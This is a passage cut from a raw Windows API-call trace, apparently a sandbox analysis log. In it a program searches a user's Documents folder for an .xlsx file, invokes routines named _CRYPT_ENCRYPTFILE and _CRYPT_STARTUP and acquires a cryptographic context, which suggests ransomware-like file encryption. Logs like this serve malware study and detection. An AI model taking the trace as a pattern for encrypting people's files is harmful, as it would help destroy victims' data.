cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.193] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.193] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0169.193] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0169.193] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0169.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.194] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0x90ae18 [0169.194] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0169.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.194] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0169.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.195] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0169.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.195] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0169.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0169.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.210] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 1 [0169.210] TranslateMessage (lpMsg=0x87f114) returned 0 [0169.210] DispatchMessageW (lpMsg=0x87f114) returned 0x0 [0169.210] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e7b0) returned 1 [0169.211] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0169.211] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0169.211] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.211] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0169.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.212] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0169.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0169.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0169.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0169.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0169.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0169.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.218] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0169.218] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.219] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.219] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.220] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0169.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0169.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0169.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0169.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.221] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, 